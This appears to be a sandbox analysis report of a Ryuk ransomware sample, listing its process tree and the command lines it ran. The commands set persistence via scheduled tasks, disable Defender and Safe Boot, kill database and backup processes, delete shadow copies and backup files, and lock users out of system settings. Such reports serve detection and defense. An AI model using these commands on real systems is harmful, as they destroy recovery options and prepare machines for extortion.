PID 1476 wrote to memory of 572 | 1476 | cmd.exe | schtasks.exe
PID 1476 wrote to memory of 572 | 1476 | cmd.exe | schtasks.exe
PID 1736 wrote to memory of 1700 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1700 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1700 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1700 wrote to memory of 1440 | 1700 | cmd.exe | attrib.exe
PID 1700 wrote to memory of 1440 | 1700 | cmd.exe | attrib.exe
PID 1700 wrote to memory of 1440 | 1700 | cmd.exe | attrib.exe
PID 1736 wrote to memory of 1976 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1976 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1976 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1976 wrote to memory of 1764 | 1976 | cmd.exe | attrib.exe
PID 1976 wrote to memory of 1764 | 1976 | cmd.exe | attrib.exe
PID 1976 wrote to memory of 1764 | 1976 | cmd.exe | attrib.exe
PID 1736 wrote to memory of 1012 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1012 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1012 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1012 wrote to memory of 1356 | 1012 | cmd.exe | cmd.exe
PID 1012 wrote to memory of 1356 | 1012 | cmd.exe | cmd.exe
PID 1012 wrote to memory of 1356 | 1012 | cmd.exe | cmd.exe
PID 1736 wrote to memory of 384 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 384 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 384 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 384 wrote to memory of 1524 | 384 | cmd.exe | cmd.exe
PID 384 wrote to memory of 1524 | 384 | cmd.exe | cmd.exe
PID 384 wrote to memory of 1524 | 384 | cmd.exe | cmd.exe
PID 384 wrote to memory of 872 | 384 | cmd.exe | taskkill.exe
PID 384 wrote to memory of 872 | 384 | cmd.exe | taskkill.exe
PID 384 wrote to memory of 872 | 384 | cmd.exe | taskkill.exe
PID 1736 wrote to memory of 288 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
pid | process
1140 | attrib.exe
1912 | attrib.exe
1440 | attrib.exe
1764 | attrib.exe
1976 | attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit2⤵
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\RyukReadMe.txt "3⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt4⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet2⤵
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wbadmin delete catalog -quiet/3⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/4⤵
- Deletes backup catalog
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop avpsus /y2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net.exenet stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop mfewc /y2⤵
-
C:\Windows\system32\net.exenet stop mfewc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net.exenet stop BMR Boot Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net.exenet stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY start=disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY$ECWDB2 start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLWriter start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SstpSvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del %02⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s hrmlog22⤵
-
C:\Windows\system32\attrib.exeattrib +h +s hrmlog23⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\hrmlog23⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
